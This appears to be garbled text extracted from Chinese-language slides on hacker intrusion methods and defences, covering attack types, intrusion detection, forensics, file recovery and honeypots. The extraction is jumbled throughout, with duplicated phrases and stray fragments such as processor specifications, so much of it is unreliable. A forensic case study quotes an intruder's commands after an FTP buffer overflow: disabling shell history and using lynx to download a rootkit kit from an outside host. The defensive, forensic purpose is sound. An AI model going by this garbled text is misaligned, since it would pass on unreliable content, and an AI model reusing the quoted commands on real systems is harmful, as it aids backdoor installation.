黑客入侵常用方法与防范措施

1、黑客入侵防范技术综述黑客入侵防范技术综述Global Opportunities622 Mbps +10 Gbps l基于 Motorola DragonBall 系列的处理器 68k核心：DragonBall 68328、EZ、VZ、 Super VZARM 核心：DragonBall MX1 网络存在的安全威胁网络存在的安全威胁网络网络内部、外部泄密内部、外部泄密拒绝服务攻击拒绝服务攻击逻辑炸弹逻辑炸弹特洛伊木马特洛伊木马黑客攻击黑客攻击计算机病毒计算机病毒信息丢失、信息丢失、篡改、销毁篡改、销毁后门、隐蔽通道后门、隐蔽通道蠕虫蠕虫 n 入侵系统类攻击入侵系统类攻击 1.信息窃听信息窃听

2、SnifferSniffer2. 口令攻击口令攻击 John3.漏洞攻击漏洞攻击 WIN/IIS、RPCn 缓冲区溢出攻击缓冲区溢出攻击 获取获取ROOTROOT口令口令n 欺骗类攻击欺骗类攻击n 拒绝服务攻击拒绝服务攻击 DDOSDDOS1.拒绝服务攻击拒绝服务攻击2.分布式拒绝服务攻击分布式拒绝服务攻击n 对防火墙等安全设备的攻击对防火墙等安全设备的攻击n 利用病毒攻击利用病毒攻击n 木马程序攻击木马程序攻击n 后门攻击后门攻击n 网络安全防范体系图网络安全防范体系图 InternetInternet路由器路由器管理管理平台平台安全监控设备安全监控设备防火墙防火墙IDSIDS防病毒防病毒服

3、务器服务器内部网内部网备份备份系统系统网络隐患网络隐患扫描系统扫描系统陷阱机陷阱机取证取证系统系统其它智能系统其它智能系统 广域网的基本概念提供的两类服务网络隐患扫描网络隐患扫描评估、评估、服务检查、服务检查、攻击性测试、攻击性测试、提交安全建议报告提交安全建议报告等功能等功能 网络隐患扫描硬件产品化网络隐患扫描硬件产品化 iTOP Net-Scanner网络入侵检测系统网络入侵检测系统IDS实时发现、实时发现、发布警报、发布警报、与防火墙与防火墙联动等功能联动等功能分布式IDS架构 产品图NIDS产品技术产品技术(一一)NIDS产品技术产品技术(二)参考对比表格NIDS技术体系结构网络入侵检

4、测系统示意图简单网络环境复杂网络环境 安全产品的性能问题规则集 膨胀产品性能降低流量增加网络入侵监控系统网络入侵监控系统IMS指定指定IP、实时发现、实时发现、制止阻断制止阻断IP包的格式普通用户普通用户HUB/SWITCH普通用户普通用户HUB/SWITCHHUB路由器/网关监控系统Internet网络入侵取证系统网络入侵取证系统nIFS国际计算机网络安全技术交流国际计算机网络安全技术交流FIRSTFIRST年会介绍年会介绍 近年近年FIRSTFIRST年会讨论的热点内容年会讨论的热点内容主要集中几个方面主要集中几个方面：近年近年FIRSTFIRST年会讨论的热点内容年会讨论的热点内容主要集

5、中几个方面主要集中几个方面：近年近年FIRSTFIRST年会讨论的热点内容年会讨论的热点内容主要集中几个方面主要集中几个方面：传统防范工具的局限传统防范工具的局限入侵取证取证取证( (Forensic)Forensic) 取证科学取证科学入侵取证技术动态入侵取证技术动态2121世纪的网络安全管理与取证技术世纪的网络安全管理与取证技术 13届FIRST年会报告Guardent公司入侵取证模型入侵取证模型技技术术标标准准类类法律基准法律基准证据的法律和法规证据的法律和法规技术基准技术基准分分 析析 策策 略略技术解决方案技术解决方案法法律律标标准准类类（一）网络入侵取证网络取证的设计与有关步骤网络

6、取证的设计与有关步骤网络取证分析过程网络取证分析过程系统信息分析模块网络数据分析模块相关性分析模块分析结果报表审计数据分析子模块系统日志分析子模块入侵分析子模块还原分析子模块统计分析子模块取证机记录系统信息网络数据事件分析案例事件分析案例事件分析案例事件分析案例USER ftp331 Guest login ok, send your complete e-mail address as password.PASS mozillaunset HISTFILE;id;uname -a;uid=0(root) gid=0(root) groups=50(ftp)whereis lynxlynx:

7、/usr/bin/lynx /etc/lynx.cfg/usr/share/man/man1/lynx.1.gzTERM=linux“lynx http:/james84.supereva.it/.1/kit.tgz事件分析案例（续）事件分析案例（续）n入侵来源：入侵来源：0（欧洲）n简单描述：简单描述：利用被取证机提供的FTP匿名服务，造成缓冲区溢出，入侵者已获得root权限。n开始时间：开始时间：03/16/2002-10:44:22 结束时间：03/16/2002-11:08:33n详细过程：详细过程：u10:44 用户FTP 匿名登录，并用mozilla作为密码，向

8、被取证机发送缓冲区溢出程序，并成功攻入获得了root权限。u10:53 开始用lynx从网站 http:/james84.supereva.it/.1/kit.tgz下载程序。u11:08 下载完毕。在被取证机上安装了后门。 （二）计算机取证文件被删除后文件被删除后UNIX/Linux文件系统文件系统directory /home/you inode 123data blocksdata blockdata blockdata block直接和间接数据块直接和间接数据块inodeblock 0block 111 indirect2 indirect3 indirectblock 12blk 2

9、0591 indirect1 indirect2 indirect2 indirectblk 206041963631 indirect1 indirectSpecific block number are typical for Berkeley FFS-like systems典型的UNIX/Linux磁盘布局label / swap /usr partition /home partition zone zone zone zone zone super inode data inode data block bitmap bitmap blocks blocks-Entire disk

10、-UNIX/Linux file systemFile system zone如果可能的话，文件的所有数据会放在同一区域内文件被删除后保留的信息directory /home/you inode 123data blocksdata blockdata blockdata block= UNIX+LINUX= LINUX only*zero references*status change time = time of deletion被删除文件信息能存活很长时间被删除文件信息能存活很长时间获取被删除文件信息的工具获取被删除文件信息的工具计算机取证计算机取证WINDOWS2000/XP 平台平

11、台NTFS 文件系统特性NTFS 文件磁盘结构NTFS 中的元数据有用的功能有用的功能几个恢复工具几个恢复工具 Windows 2000/xp 中的系统日志文件用户日志文件注册表一些应用文件格式典型foxmail邮件箱格式一些应用程序缓冲一个取证系统的框架磁 盘 现 有 数 据 获 取磁 盘 数 据 恢 复恢 复 数 据 整 理待 分 析 数 据 预 处 理系 统 元 数 据 分 析系 统 与 用 户 日 志 分析用 户 文 档 分 析系 统 注 册 表 分 析综 合 分 析中科院高能所掌上操作系统设备的记忆成像掌上操作系统设备的记忆成像Joe GrandJoe Grand11:45am-12

12、: 30pm11:45am-12: 30pmJune 26, 2002-7-31 June 26, 2002-7-31 1414thth Annual FIRST Computer Annual FIRST Computer Security IncidentSecurity IncidentHanding ConferenceHanding Conference网络入侵陷阱技术ITS陷阱机系统陷阱机系统系统内核系统内核陷阱机内核套陷阱机内核套陷阱机设置和日志陷阱机设置和日志陷阱陷阱Email陷阱陷阱Web陷阱陷阱FTP陷阱陷阱DNS网络陷阱机网络陷阱机网络入侵诱骗网络入侵诱骗陷阱主机InternetID